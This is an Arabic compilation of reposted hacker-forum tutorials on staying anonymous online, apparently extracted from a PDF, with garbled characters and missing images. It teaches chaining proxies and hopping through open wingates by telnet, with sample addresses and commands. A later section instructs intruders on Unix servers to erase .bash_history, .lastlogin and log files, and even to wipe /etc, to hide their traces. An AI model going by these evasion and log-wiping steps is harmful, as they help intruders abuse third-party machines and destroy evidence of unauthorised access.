    ‫مثال اقتر ح عليك البحث في بالد العالم الثالث أو الشرق األوسط وأفريقيا وأخيرا شبكة @‪ home‬كلهم‬
                                                            ‫يتشابهون ولديهم صفات شائعة وهي:‬
‫توفر ‪ wingates‬والذي وفق بصورة رديئة وعادة هناك ‪ wingate‬مفتو ح قليل على ‪ NetWork‬حقهم‬
                                                                                              ‫...‬
                                                   ‫خالل ‪ Unix‬أفضل طريقة هي: المحاولة والخطأ‬
                                                                           ‫‪Trial and Error‬‬
                                                      ‫اتصل بالتلنت في ‪ wingate‬من المنفذ 36‬
‫واذا لقيت اترك فراغ االسم والباسوورد واذا دخلت را ح تحصل واحد أيضا بإمكانك تجربة اسمك وكلمة سرك‬
                                           ‫او تستخدم ميزة( ‪ Guest‬الضيف) أو‪Anonymously‬‬

                                                       ‫‪Introduction to Socks Host‬‬
                                                   ‫(=الدخول أو اإلدخال إلى=)‪Socks Host‬‬
  ‫‪Socks Host‬تقريبا مثل ‪ WinGate‬لكن االختالف وهو ان السوكس يتصل من خالل المنفذ 2022‬
                                         ‫وبإمكانك عمل اإلعدادات عليها وهي تتوفر في المتصفح‬
                                                            ‫‪explorer and netscape‬‬
                                                            ‫وبإمكانك إضافة ‪Socks Host‬‬
    ‫وهذه الطريقة تستخدم كثيرا في ‪ Mirc‬وتقوم بحمايتك وبإخفاء ‪ ip‬الخاص بك وتعمل كـ ‪FireWall‬‬


                                                                          ‫**********************‬
                                                       ‫وهذه برامج مساعدة على بقائك مجهول الهوية‬
                                                                          ‫**********************‬
                                                                                    ‫‪Ghost Surf‬‬
                                                               ‫$$$$$$$$$$$$$$$$$$$$$$‬
                                                                                       ‫‪Stealther‬‬
                                                         ‫-------------------------------------------‬

                                                        ‫ابحثوا عن البرنامجين السابقين في اإلنترنت‬

                                                   ‫--------------------------------------------‬
                                     ‫لكن أعلم ياأخي الكريم أن وبكل مافعلت لن تصبح مجهوال 222%‬

                                            ‫انتهى،،،‬




‫" كيف تبقى مجهول الهوية في النت(الجزء الثاني)؟؟ "‬

                                                                         ‫<منقول من منتدى إعصار>‬

                                                                                  ‫<الكاتب: المدمر>‬




                                             ‫101‬
                                   ‫ألحين الموضوع هذا سوف يكون فيه تطبيق عملي وليس كالسابق...‬

‫هذه الفقرات عن ‪ Chaining Proxies‬لبقاء حريتك وسريتك على اإلنترنت وقت أطول أثناء اتصالك لكن‬
                  ‫التظن ان هذا الموضوع كافي فكلما قرأت عن هذا الجانب سوف تصبح الشخص المجهول‬
                       ‫وأيضا سوف نتكلم عن ‪ Chaining wingates‬لتصبح مجهوال على ‪Telnet‬‬

                                                    ‫-------------------------------------------(‬
‫من المعروف أن أغلبكم يستخدم ‪ proxy‬إلخفاء ‪ ip‬الخاص به او ‪ Domain‬او قد يستخدم البروكسي لكي‬
                                                      ‫يجتاز المواقع المغلقة وأيضا لحماية هويته .‬
  ‫لكن عليك ان تتعلم كيف تستخدم ‪ Proxy‬ومن األفضل ان تعرف ماذا هو ‪ Ip Address‬و ‪Domain‬‬
                                                                                         ‫أوال ,,,‬
       ‫قبل أن تقرأ هذا الموضوع علي اوال ان اقوم بإرشادك كيف تحصل على ‪ Proxy‬مع تحديثها من هذه‬
                                                                                        ‫المواقع:‬
                                        ‫‪http://www.multiproxy.org/anon_list.htm‬‬
                                           ‫/‪http://tools.rosinstrument.com/proxy‬‬
     ‫أو هنالك طريقة أفضل لكم وأنصحكم إنكم تسجلون بـ ‪Group‬وهو يقوم بإرسال بروكسيات جديدة جدا‬
                                                                                  ‫وبمنافذ مختلفة‬
                                           ‫الجروب‪:P_R_O_X_Y@yahoogroups.com‬‬
                                                                                  ‫طريقة التسجيل‬
                                              ‫قم بالدخول إلى حسابك وأرسل للجروب بهذه الطريقة‬
                                                                       ‫في خانة اإلرسال إلى اكتب‬
                                     ‫‪P_R_O_X_Y-subscriber@yahoogroups.com‬‬
                          ‫وأرسل رسالة فارغة إليهم بعد ذلك سوف تتلقى رد مباشرة قم بعمل ‪Replay‬‬
                                                                  ‫اآلن مبروك لقد سجلت بالجروب‬
                                                    ‫(-------------------------------------------‬

                                                        ‫=========================‬
                                       ‫أن لن أقوم بمساعدتك في كل عمل تقوم به تستطيع التأكد من أن‬
                                                                      ‫البروكسي يعمل بالذهاب إلى :‬
                                                                   ‫/‪http://www.privacy.net‬‬
                                                                                              ‫أو‬
                                                           ‫/‪http://www.proxytester.com‬‬

      ‫وقد تعرف هل عنوان ‪ Ip‬تغير أم ال !!! هذا بالنسبة للموقع األول أما الموقع الثاني فهو خاص لكشف‬
                                                                   ‫البروكسيات واعطائك مستوياتها..‬
                                                      ‫=========================‬

                                                        ‫*************************************‬

                                                                    ‫&&&&&&&&&&&&&&‬
                                                                          ‫‪proxy server‬‬
                                                                    ‫&&&&&&&&&&&&&&‬

                                ‫هو خادم ‪ Proxy‬يقوم باالتصال بين)‪:(WebSite,IRC Chat,etc‬‬

   ‫هذه البروكسيات تقوم بإرسال طلبات لكي يستقل او يستعرض المستخدم موقعا على اإلنترنت البروكسي‬
 ‫يرسل طلبك على اإلنترنت لكي يطلب هذا الموقع وبعد ذلك سوف تدخل الموقع ببروكسي وهذا سوف يخزن‬
                                                                        ‫في ‪Proxy Server‬‬
                                                                ‫كما قلنا في الموضوع السابق...‬
                                            ‫هذي توضح كيف تتصل عن طريق البروكسي بالموقع‬


                                             ‫201‬
                                              ‫]‪[User]>>>>>[Proxy]>>>>>[Web Pages‬‬

                                                                                     ‫----------------‬
                                                                               ‫‪Proxy Chaining‬‬
                                                                                     ‫----------------‬
  ‫معناها عدة بروكسيات وهذي طريقة فعالة جدا لكي تصبح مجهوال الهوية حيث يمكنك ان تتصل بأكثر من‬
                                                                       ‫بروكسي لكي تعرض موقع واحد‬
                                                                                                 ‫مثال/‬
‫]‪[User]>>>[Proxy1]>>>[Proxy2]>>>[Proxy3]>>>[Proxy4]>>>[Destination‬‬
  ‫يوضح هذا المثال ان المستخدم اوال عليه االتصال بالبروكسي االول فالثاني فالثالث والرابع وأخيرا الهدف‬
                                                                             ‫مما يسبب بطأ في االتصال‬
                             ‫‪Destination = web page, Unix server, ftp server, etc‬‬
       ‫إذا ‪ Proxy chaining‬مطلب ضروري لكي يستخدمه أي هكر ليحفظ سريته اثناء الدخول إلى أي‬
                                                               ‫‪server‬مثل ‪telnet, ftp, or http‬‬
   ‫‪Chaining‬هي مهمة كما أقول لن تصبح مجهوال 222% لكن حاول بقدر المستطاع على ان ال تمسك‬
  ‫ويطادونك مثل السمكة لكن البروكسيات المتعددة صعب ان يكشفها احدا لكن مثال حاولت تدخل على موقع‬
                                  ‫بالـ ‪ftp‬را ح يصطاد البروكسي بعد كذا لو كان معاه فلوس كان طلب من‬
   ‫‪Adminstrator‬ملفات ‪ Logs‬لكي يعرف المصدر والمصدر ايضا را ح يكون ‪ proxy‬ههههههههه‬
     ‫يعني على هذا المنوال إلى ان يصل الى المستخدم لذلك عملية ‪ Chaining Proxy‬عملية مفيدة جدا‬
                                                                            ‫ويصعب احدهم االمساك بك‬
‫لكن ملفات ‪ Logs‬تنحذف في اوقات بعد الضغط على البروكسي لكي يصل الى الحد المسمو ح به من تحميل‬
   ‫الملفات على البروكسي الخادم الي يحتوي على البروكسيات لذلك سوف تصبح ملفات ‪ Logs‬متجددة...‬

                                                                  ‫----------------‬
                                                               ‫‪HTTP Chaining‬‬
                                                                  ‫----------------‬
    ‫‪HTTP chaining‬هي نفس طريقة ‪ Proxy‬ويمكنك عملها من مستعرضك وفي خانة ‪Address‬‬
                                                                             ‫مثال:‬
                   ‫‪http://proxy.magusnet.com/-_-http://www.google.com‬‬

                                          ‫حركة جميلة وجديدة (-_-) لم ترونها مسبقا صحيح !!!‬
                                                      ‫وأيضا يمكننا استخدام ‪ Chaining‬مثل:‬
                       ‫-_-/‪http://proxy.server1.com/-_-http://proxy.server2.com‬‬
                                                      ‫‪http://www.destination.com‬‬

                                                            ‫او يمكننا وضع عناوين بروكسيات بمنافذها‬

                     ‫‪http://anon.free.anonymizer.com/http://www.google.com‬‬

                                                                                             ‫مثال آخر‬

                                                                         ‫كإضافة عالمة (/) بين المواقع‬

            ‫‪http://proxy1/http://proxy2:80/proxy3:80/http://www.yahoo.com‬‬
                                      ‫= ‪proxy‬استبدله ببروكسي رقمي يكون أفضل لك .....‬

                                                                        ‫----------------‬
                                                                ‫‪Browser Chaining‬‬
                                                                        ‫----------------‬
‫وهو استخدام البروكسي من متصفحك وانا سوف يكون حديثي فقط عن ‪ Internet Explorer‬ألنه األكثر‬


                                               ‫301‬
                                                                                    ‫استخداما ----‬
                                                                         ‫ألحين مثال عندنا بروكسي‬
                                                                         ‫08:32.421.432.312‬
                                                                     ‫العنوان:36..62..36.326‬
                                                                                        ‫المنفذ:20‬
                              ‫ألحين كيف نحطها بدال البروكسي الخاص بالـ ‪ISP‬أي مزد خدمة اإلنترنت‬
                                                                                        ‫نرو ح عند‬
                                                                                    ‫أدوات‪Tools‬‬
                                                            ‫خيارات إنترنت ‪Internet Options‬‬
                                                                ‫بعدين اتصاالت ‪Connections‬‬
                                                         ‫تختار االتصال الي تدخل في االنترنت بعدين‬
                                                                             ‫إعدادات ‪Settings‬‬
                                                                                          ‫را ح تجد‬
                                                                            ‫( ‪Address‬العنوان)‬
                                                                                   ‫( ‪Port‬المنفذ)‬
                                                                                     ‫ونضعه بداله‬
                                     ‫العنوان:36..62..36.326 المنفذ:20 وبعد كذا اضغط موافق و‬

                          ‫والحين نبغى نستخدم االستعراض المتعدد ‪Chaining Proixes‬‬
                           ‫بدال مانحط بروكسي واحد في العنوان نحط أكثر من واحد مثل كذا/‬
    ‫08 :‪Address: 213.234.124.23:80 121.172.148.23:80 143.134.54.67 Port‬‬

                  ‫$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$‬


                                                                       ‫&&&&&&&&&&&&&&‬
                                                                                      ‫‪Wingates‬‬
                                                                       ‫&&&&&&&&&&&&&&‬
 ‫‪Wingate‬هو ‪ proxy server‬الذي ينزل في جهازه او جهازها ليسمح بالفرد او بعدة أفراد ليأخذون‬
                                                   ‫مقاعدهم بالمنفذ خالل 36 ((منفذ ‪ Telnet‬العادي ))‬
    ‫بعض ‪ Wingates‬يسمحون ألي شخص متصل ‪ online‬لكي يتصلون به مباشرة او في وقت قصير‬
‫التتعدى االيام لكن اعلم ان هذا ليس من القانون وهنالك خصائص للـ ‪Admin‬تمنع من استخدام ‪wingate‬‬
                                    ‫على جهازه هذا على حسب المدير هل يفهم في هذا المجال أم ال !!!!‬
 ‫وهي عبارة عن ‪ ip‬أجهزة أو اسماء أجهزة تتصل من خاللها على المنفذ 36 بأداة ‪ Telnet‬أو يمكنك من‬
                                                                                  ‫عمل بحث ببرامج‬
                                                                                      ‫‪WinScan‬‬

                                                                                      ‫‪Wingate‬‬




                                              ‫401‬
                                                                                 ‫‪Download‬‬

                                                            ‫-------------------------------‬
                                                  ‫‪Chaining Wingates Using Telnet‬‬
                                                            ‫-------------------------------‬

                               ‫ألحين را ح نستخدم عدة ‪ Wingate‬كالسابق واألدوات التي نحتاجها‬

      ‫هي فقط ‪ DoS‬وأداة ‪ Telnet‬ألظن أن األجهزة سوف تخلو من أهم هذين األداتين إال نادرا .....‬

‫جميع ‪ wingate‬تتصل عن طريق المنفذ 36 لكن المنفذ ليس مهما لكني سوف أضيفها لكم لكي تتعلموا‬
                                             ‫فقط كيف يتم االتصال بالـ ‪ Telnet‬عن طريق المنافذ‬

                                                                ‫وهذا عنوان جهاز امكننا إحضاره‬

                                                            ‫هو 232.822.332.22 ومنفذه 36‬

                                                        ‫ويتم االتصال به عن طريق ‪ Telnet‬مثل:‬

                                        ‫32 031.911.331.16 ‪C:\WINDOWS>telnet‬‬
                                      ‫الحظ وجود المسافات فمسافة زائدة او ناقصة قد تعثر خطوتك‬

                                                         ‫بعد كذا سوف تتصل بالوين جيت مثل هذا‬

                                                      ‫32 661.371.702.302 >‪Wingate‬‬

                              ‫بعدين تقدر تكرر العملية اكثر من مرة ولكن مع تغيير العنوان يعني كذا‬

                                                            ‫32 54.99.71.312 >‪Wingate‬‬

                                                                         ‫وأيضا اتصل مرة أخرى‬

                                                              ‫32 7.212.56.01 >‪Wingate‬‬


                                          ‫501‬
        ‫ اتصل بالموقع‬wingate ‫ألحين بعد ماتتصل بأكثر من‬

                         WinGate>arbornet.org

                      ‫اذا الطريقة وبخطوة سريعة تبدو كذلك‬

      C:\Windows> telnet 61.133.119.130 23

                  Wingate>203.207.173.166 23

                   Wingate>135.245.18.167 23

               Wingate>m-net.arbornet.org
Connecting to host arbornet.org...Connected

     ،،،‫انتهى‬




      106
‫"بين حماية الخصوصية وإزالة األثارمن ملفات الـ‪"Logs‬‬

                                                                 ‫<منقول من منتديات الحزم اإلسالمية>‬
                                                                              ‫<الكاتب: حزم الظامي>‬


‫فيما يتعلق بموضوع التخفي ومنع تعقب االثر مع سيرفرات يونكس أو لينوكس . أوالً البد أن تعلم أن من أهم‬
        ‫خواص يونكس التي تمنحه القوة . تقوم على تعدد المستخدمين ‪. Unix Multi-User Mode‬‬
 ‫. ‪ Operation‬ثم ال بد أن تعلم أن) ‪ ( Linux‬هو االصدار المجاني من نظام يونيكس . ) ‪ ( Unix‬يعني‬
                          ‫األفضل فهم يونيكس فحتما ً ستتعامل مع لينوكس بكل ارتيا ح كونك تتعامل مع‪Unix‬‬

                                                                ‫أوالً أريد أقسم الموضوع لقسمين رئيسين:‬
      ‫ساتكلم عن كل واحد منهما بعجاله الن الموضوع ما تكفي ساعات معدودة لكتابة كل شيء عنه . بل وهللا‬
‫اتوقع ان عمر ابن ادم يفنى وهو يبحث عن االمن على االنترنت وكل ما تقدم مستواه كل ما اصبح يعي تماما ً‬
                                     ‫كل ما حوله وما يجب ان يقوم به من اجل التخفي ومنع تعقب االثر ....‬

                        ‫القسم األول : يخص ملفات النظام التي يسجل فيه اجراءاتك ) ‪... ( LOG File‬‬
           ‫القسم الثاني : يتعلق باتصالك وحماية خصوصياتك ... وهذا يقف عن قدرات كل شخص فينا ....‬




   ‫في الواقع جميع االجهزة في انترنت تجمع المعلومات عنك ، ابسطها مثل عنوان ال ‪ IP‬و اكثرها حساسية‬
     ‫مثل اسمك و رقم الهاتف الخاص بك ربما و عنوانك البريدي ........ ملفاتك و جهاز كومبيوترك محمي‬
  ‫بصورة جيدة للغاية لو ارتبط بانترنت بواسطة نظام التشغيل فقط و بدون استخدام برمجيات اضافية، ولكن‬
       ‫حتى ولو حصل ذلك ففي غضون االسابيع القليلة االولى سيفقد الجهاز الكثير من اجزاء حمايته نتيجة‬
      ‫لالستخدام الغير سليم النترنت تتابع الشركات نظم التشغيل بشدة، الكل يتابع الثغرات في ‪Microsoft‬‬
 ‫‪Windows‬و ‪ Linux‬و ‪ Mac‬و غيرهما ، لذلك من الصعب الوصول الى تلك االجهزة بصورة فورية و‬
                                                                               ‫بدون تدخل رسمي ....‬

                                                                                                     ‫!‪Error‬‬




                                                ‫701‬
              ‫والحقيقة انا الزلت في بداية طريقي لهذا المجال واسال هللا ان يسهل ويفتح علينا من فضله ..‬


                                        ‫القسم األول : يخص ملفات النظام التي يسجل فيه اجراءاتك ...‬
                 ‫ما يتعلق بملفات التسجيل الجراءاتك تسمى . ) ‪ ( LOG File‬مؤرخه بالوقت واإلجراء .‬
                                                   ‫وتسمى سجل االحداث كما تسمى ملفات سجل األداء‬

   ‫تسجل جميع مزودات الويب )‪ (Web servers‬معلومات واسعة عن حركة الوصول إلى موقعك، ضمن‬
 ‫ملفات سجل األداء ،)‪ (log files‬وهي عبارة عن ملفات نصوص بسيطة تلتقط نشاطات الكمبيوتر المزود.‬
‫ويمكن تحليل معلومات سجل األداء يدوياً، وهذا ما كان يفعله الناس، في بدايات شبكة ويب. لكن إذا زاد حجم‬
    ‫ملف سجل األداء )‪ (log file‬عن بضعة كيلو بايتات، فإن التحليل اليدوي يصبح غير عملي، إن لم يكن‬
         ‫مستحيالً كليا ً. وإذا أخذت بعين االعتبار أن مزودات اليوم تولد ملفات لسجل األداء، يصل حجمها إلى‬
 ‫ميجابايتات كثيرة، بل ويصل في كثير من األحيان إلى جيجابايت أو أكثر، ألدركت ببساطة أن التحليل اليدوي‬
                                                                                    ‫غير وارد إطالقا ً.‬
                                                                                   ‫ملفات سجل األداء‬
    ‫تبعا ً لمزود الويب الذي تستخدمه، تحتوي ملفات سجل األداء، على بعض-ومن المحتمل جميع-المعلومات‬
                                                           ‫التالية، لكل زيارة يقوم بها زائر إلى موقعك:‬
 ‫وأريد أخبرك ان ثمة ملفات ال يمكنك الووصول لها وهي تراقب كل اجراءاتك ... وتختلف االجراءات األمنية‬
                                             ‫من نظام الخر حسب قدرات مدير النظام الذي تعمل عليه ...‬




                                                ‫801‬
                                                                                        ‫اقتباس :‬




                                 ‫عموما أخوي هيكس تكلم عن هذه الملفات في نظام. ‪WIN NT‬‬
                                       ‫وكيف يتم إزالة اللوق فايل ويمكن الرجوع لدرسه ...‬




                                            ‫وانا االن را ح اخبرك عن اهمها وال يشترط ان تزيل كل شي :‬
  ‫(فما ال يدرك كله ال يترك جله ) ودائما ً حتى ال تحبط ( إذا لم تستطع شيئا ً فدعه وجاوزه إلى ما تستطيع )‬
‫عموما الطريقه المثلى للتعامل مع انظمة يونكس ... هي استخدام الشل النصي وهذا رأيي فأنا إلى االن اعيش‬
 ‫في ذهول من قدرات هذا النظام العجوز ... يكفي ان الدوس صاحب االمكانيات والسهولة .. وسرعة التنفيذ‬
 ‫واالستجابه هو في األصل جزء أو أداة من أدوات يونيكس وعملت مايكروسوفت على تطويرها واال فاالصل‬
                                                                             ‫هو يونكس بال ادني شك ...‬
                          ‫عموما أهم الملفات حاليا ً أريدك تحذفها كل ما تستخدم الشل النصي . هي كالتالي :‬
                                                                                          ‫‪.lastlogin‬‬
   ‫بدايته بنقطه مما يعني انه ملف مخفي فاي ملف أو مجلد يبدا بنقطه اذا هو مخفي مباشرة في يوينيكس .‬
                                                         ‫وهذا الملف يسجل به اخر ايبي سجل الدخول .‬

                                                                                    ‫‪.bash_history‬‬
                                                                ‫هنا را ح تسجل جميع األوامر التي نفذتها‬

                                                                                  ‫‪.contactemail‬‬
                                                       ‫اذا ما كنت تستخدم الشل النصي للتعامل مع البريد‬

                                                                 ‫أيضا ً أريد منك حذف هذين المجلدين‬
                                                ‫‪Tmp‬واالخر ‪ .trash‬ويا حبذا تنسف معهم مجلد. ‪etc‬‬

                                                                 ‫هنا مشكلة ربما يعرفها البعض .‬
                                       ‫هو كوني حذفت ملفي‪.lastlogin & .bash_history‬‬
                ‫باستخدام االمر ‪ rm‬تلقائيا ً را ح يكون ناتج هذا االجراء تجدد ملف الباش‪.bash_history‬‬
                                                                                   ‫ليصبح محتواه :‬
                                                                          ‫‪rm .bash_history‬‬
                                                                          ‫‪rm .bash_history‬‬

                              ‫ورا ح يكون ناتج ملف ‪ .lastlogin‬هو االيبي الذي دخلت به اخر مره .‬
                                       ‫طيب وش الحل ننسفها نهائيا ً وما نريد أوامر الحذف تظهر ....‬
   ‫الطريقة تستخدم ‪ cpanel‬هو أفضل إجراء . وللعلم يا أخون هناك اعدادت جباره في اليونكس تمكنك من‬
                                                                    ‫االبداع ومن التجديد واالبتكار ..‬

    ‫واذا مد هللا في‬      ‫عموما أخواني للعلم حتى يمكنك اللعب بالنظام كامل بااليبي المحلي‪: localhost‬‬
                                                          ‫العمر تكلمنا عن هذا الموضوع باذن هللا ...‬

  ‫الحظ هذه الصورة : وهي من سي بانل مش فوتوشوب وبنفس الطريقة تتحكم في السيرفر بال اي معلومات‬
                                                                ‫عن المصدر الحقيقي لالتصال ....‬




                                                 ‫901‬
  ‫عموما سأعود لهذا الموضوع اذا مد هللا بالعمر وهللا اني اعمل من اشهر على كتابة دروس نظرية وتطبيق‬
                                                                         ‫عملي الحتراف يونيكس ...‬
 ‫ورا ح نكمل الحديث عن ملفات اللوق وحذفها حتى وإن لم يكن مسمو ح لك بملكيات ... فوهللا تستطيع الحذف‬
                                                                                               ‫...‬

                                                                          ‫ننتقل للجزء االخر ...‬
            ‫القسم الثاني : يتعلق باتصالك وحماية خصوصياتك ... وهذا يقف عن قدرات كل شخص فينا ....‬

  ‫أخوي الحقيقة المشكلة أن األغلب منا يستخدم إما نفس البروكسي لمستضيف الخدمه اللي يستخدمه .. وان‬
    ‫سهل هللا .. اشتغل ببروكسي يعمل مع بروتوكوالت التصفح ) ‪ (HTTP Protocol‬ويجب أن ندرك أنك‬
                                                  ‫حين تتعامل مع نظام يونيكس أو االنظمة االخرى الشبيهه‬
     ‫والحقيقة ان كونك تستخدم البروكسيات المعتاده للتصفح فهذا ال يخفي هويتك اذا استخدمت بروتوكوالت‬
    ‫‪ HTTP‬ولكن الحل األمثل .... أنك تستخدم بروكسيات السوكس . ‪ SOCKS Protocol‬فيجب عليك‬
          ‫إيجاد ارقام سوكس الستخدامها حماية لخصوصيتك أو عند الحاجة للتخفي اناء عملك على النظام .‬
                                                             ‫عموما البروكسيات في مجملها ثالثة أنواع .‬
                                    ‫2) ‪ Web Proxy Service‬وهذا للتصفح. ‪. HTTP Protocol‬‬
     ‫6) ‪ WinSock Proxy Service‬وهذا مفيد مع سيرفرات ‪ windows NT‬ويفيد في عملها على‬
             ‫اخفاء هويتك عند العمل على بروتوكوالت ‪ telnet‬أو ‪ FTP‬وهذا هو البروتوكول ‪WinSock‬‬
                                                                                       ‫...... ‪Protocol‬‬
         ‫3) . ‪ Socks Proxy Service‬وهذا األقوى ويستفاد منه في ‪(SSL) Secure Sockets‬‬
      ‫‪Layers‬باالضافة إلى ‪ (IIS) Internet Information Server‬ويخدم مع ‪Windows NT‬‬
       ‫وكذلك 3‪ FTP ، Telnet، Gopher،IRC ، RealAudio ، POP‬وهذا النوع يجمع بين كونه‬
 ‫‪firewall‬إضافة إلى خدمة أمنية ... ‪ . securiy‬وتكمن وظيفته في تغيير معلومات موارد خدمة االنترنت‬
‫التي تتصل بها ..... وعادة ما يستخدم فيها بروتوكول ‪ TCP/IP‬ويستخدم هذا البروتوكول وسيلتين لالتصال‬
                                                                                                          ‫:‬
              ‫*طريقة المنظمة العالمية)‪(Internationa Organization for Standardization‬‬
     ‫**مجموعة بروتوكوالت لالتصاالت . وضعتها وزارة الدفاع األمريكية ‪. ransmission Control‬‬
                                                                                    ‫... ‪Protocol TC‬‬
  ‫الحقيقة أخواني هناك أمر هام جداً وهو أن ثمة برامج تساعدك كثيراً بتقنياتها المحترفة تساعدك في التخفي‬
                                             ‫من تقنيات الرقابة التي ال يخلوا منها نظام ... وهي كثر جداً :‬
‫‪ Ping، Traceroute, DNS lookup, Finger, Whois, LDAP, SNMP‬وهذا يكون باعتبار‬
     ‫النظام واعتبار بروتوكول االتصال الذي يستخدمه نظام ... ‪ : WIN NT‬ويستفيد من وتوكول ‪TCP/IP‬‬
                                                                                         ‫لمراقبة النظام ...‬
    ‫وبالمقابل يتم مراقبة نظام ‪ UNIX‬عن طريق الرواتر ‪ . Router‬وهو أداة فعاله لتشخيص النظام ونعني‬
    ‫بهذا المصطلح أي الموجه أو الموزع ويتميز الراوتر بقدرته على التعرف على كل جزء من أجزاء الشبكة‬
           ‫ويعمل عى مراقبة األداء وموازنة سير البيانات ويسمح للشبكات المتصلة بالحفاظ على استقالليتها‬
                                                                      ‫...ومواصفاتها وعناوينها الخاصة .‬
 ‫وهنا نوعين للموجهات أو الموزعات . ) ‪ (Router‬األول : إستاتيكي يتطلب من مدير الشبكة ضبط يدوي .‬
                                                                                ‫ويتميز هذا النوع باالمان.‬


                                                  ‫011‬
         ‫والثاني ديناميكي .... يقوم بأعماله اتوماتيكيا ً ...ويحتاج الى ضبط بسيط وهو أقل أمانا ً من األول .‬

    ‫عموما انا اسف ربما تفرعت في هذا الموضوع . عموما إخواني بالنسبة لالتصال ... أنا أقول لكم عليكم‬
        ‫بتشفير أو إخفاء أو تزوير بياناتكم باي طريقة ... ببرامج أو بدون . وعليكم بمراقبة هذه البورتات :‬

                                                                                   ‫‪Port 21 = FTP‬‬
                                                                                ‫‪Port 23 = Telnet‬‬
                                                                                 ‫‪Port 25 = SMTP‬‬
                                                                                   ‫‪Port 53 = DNS‬‬
                                                                                ‫‪Port 79 = Finger‬‬
                                                                                 ‫‪Port 80 = HTTP‬‬
                                                                               ‫3‪Port 110 = POP‬‬
                                                                             ‫‪Port 111 = SunRPC‬‬
                                                                             ‫‪Port 139 = NetBIOS‬‬
                                                                                  ‫‪Port 443 = SSL‬‬
                                                                             ‫‪Port 1080 = SOCKS‬‬
                                                                               ‫‪Port 8181 = IMail‬‬

‫والحقيقة األفضل من هذا كله أن تسجل دخولك بااليبي المحلي أو البد أن تستخدم بروكسيات من نوع سوكس‬
                                                                                              ‫.‬
‫وهناك برامج جيدة كالتالي : أفضلها في نظري أداءاً وسهولة ... برنامج ‪ HTTPort‬ومعروف لديكم أكيد .‬
                                                                      ‫صورة للبرنامج اناء عمله.‬




 ‫تقنية حديثة مرتبطة ببروتوكول االتصال ‪ TCP/IP‬الخاص بشبكة اإلنترنت، فقد صمم برنامج ‪HTTPort‬‬
  ‫من أجل إخفاء الهوية الحقيقية عن اآلخرين وأيضا يتخطى المرشح)البروكسي( ‪ Proxy Server‬التابع‬
       ‫لمزود الخدمة ‪ ISP‬وأشبه ما يوصف بأنه برنامج يشغل برامج اإلنترنت من تحت نفق وهمي يتجاوز‬
                                     ‫الحواجز األمنية (المرشح ‪ ( Proxy‬وليرتبط مع بروكسي آخر.‬
    ‫وكما ذكرنا فان برنامج ‪ HTTPort‬بطريقة عمله يحقق حرية التصفح في شبكة اإلنترنت وإخفاء هوية‬
                                                                                     ‫المستخدم .‬
   ‫بل وستخدم ايضا ً بروتوكول ‪ SOCKS‬ويقوم بدوره خير قيام فهو يخفي هويتك وال يمكن حتى لمسؤول‬
                                                  ‫الشبكة المحلية معرفة نشاطك ناهيك عن هويتك ...‬
                                               ‫وهنا ايضاحات لبعض الخدمات التي يؤديها البرنامج ؟‬




                                                 ‫111‬
112
      Error!




113
      Error!




114
115
    ‫هذا باالضافة إلى أن المتصفح اكسبلورر يسمح لك باضافة بيانات مزود الخدمة ... سواءاً كان الفعلي أو‬
                                                                   (Anonymous )‫وهمي للتخفي‬

      :‫وهناك برنامج صغير ال يتعدى حجمه 02 كيلو بايت إال أنه يخدم أكبر من حجمه بكثير جداً ... واسمه‬
                                                                              AnalogX Proxy
      : HTTP (web), HTTPS (secure web), POP3 (recieve mail), ‫فهو يدعم كل هذا‬
             SMTP (send mail), NNTP (newsgroups), FTP (file transfer), and
    Socks4/4a and partial Socks5 (no UDP) protocols! It works great with
     Internet Explorer, Netscape, AOL, AOL Instant Messenger, Microsoft
                                                              Messenger, and many more!




                                                                      ‫يمكن تحميله من هنا‬
                                            http://www.analogx.com/files/proxyi.exe

                                                      : PortBlocker‫ويدعمه برنامج آخر اسمه‬
 ‫يساهم في حماية البورتات التي تستخدمه في تصفحك أو نقلك للملفات أو غيرهما من ان تستخدم في مراقبة‬
                                                                    : ‫تحركاتك وتسجيل معلوماتك‬
    PortBlocker is configured to block the most common types of servers
         that might be on a system (FTP, HTTP, etc), so will not require any
 modification for most users. If you are running a special server of some
     sort, then you can easily add it's ports (either TCP or UDP) to it's list,
                                              and have them blocked and/or logged.
Log unauthorized port access attempts and secure internal servers from
                                                                internet access easily...




                                              116
                                                           ‫حمل من هنا برنامج‪PortBlocker‬‬
                                            ‫‪http://www.analogx.com/files/pblocki.exe‬‬

‫والحقيقة أحمد هللا الذي ذكرني بهذا البرنامج المميز وهو الذي يوضح لك كل المعلومات التي سجلت لمراقبتك‬
                                                                                ‫أناء عملك على نظامك.‬
                                        ‫بالطبع كلكم تعلمون أن مايكروسوفت معروفة بطبعها التجسسي ...‬
‫فأقدم لكم هذا البرنامج لكي تعرفوا كل ما تم تسجيله عنكم وال تنسوني من دعوة ... الني متأكد ان الكم الهائل‬
                 ‫من المعلومات المرسلة والتقارير عنك وعن غيرك منتظمة وخفية ولكن آن لها أن تفضح ...‬
                                                            ‫اسم البرنامج‪: Proxy Log Analyzer‬‬

                                                                                               ‫صورة :‬
                                                                                                     ‫!‪Error‬‬




                                                 ‫711‬
                                              ‫ بدون ضغط‬MB 2.21 : ‫للتحميل‬
                http://www.mechanicalminds.com/software/pla/setup.exe

                                        ZIP archive instructions 818 kb
                    http://www.mechanicalminds.com/software/pla/pla.zip

                               . ‫ناهيك عن أن المتصفح يسمح لك بتعبئة البيانات كما تحب‬
  Provides a space for you to type the address and port number of the
proxy server you want to use to gain access to the Internet over HTTP,
                          Secure, FTP, Gopher, and Socks protocols.
                                               : ‫فقط استخدام االعدادت المتقدمة لالتصال‬




                                       118
‫حتى االيبي بالماسنجر بامكانك ترسل كل ملفاتك بال حصول أي انسان على االيبي الحقيقي لك .‬
                       ‫والطريقة سهله ... اذهب افتح الماسنجر من قائمة ادوات خذ خيارات.‬




                               ‫انتهى،،،‬



                                 ‫911‬
‫"برنامج ‪ HTTP Port‬الذي يجعلك تتصفح النت متخفيا!!"‬

                                                 ‫<منقول من منتدى نجم دوس>‬

                                                              ‫<الكاتب:المدمر>‬

                                                                 ‫اسم البرنامج:‬
                                                      ‫------------------------‬
                                                           ‫‪HTTPort 3snf‬‬
                                                      ‫------------------------‬

                                                                      ‫الوظيفة:‬
                                                      ‫------------------------‬
                                                   ‫برنامج لتصفح بسرية وأمان‬
                                                                   ‫في األنترنت‬

                                               ‫ويريحك من البروكسيات الرقمية‬

                                                              ‫ومن البحث عنها‬

                                                                    ‫,,,,,,,,,,,,‬
                                                      ‫------------------------‬


                                                      ‫وصلة التحميل‬
                                            ‫------------------------‬
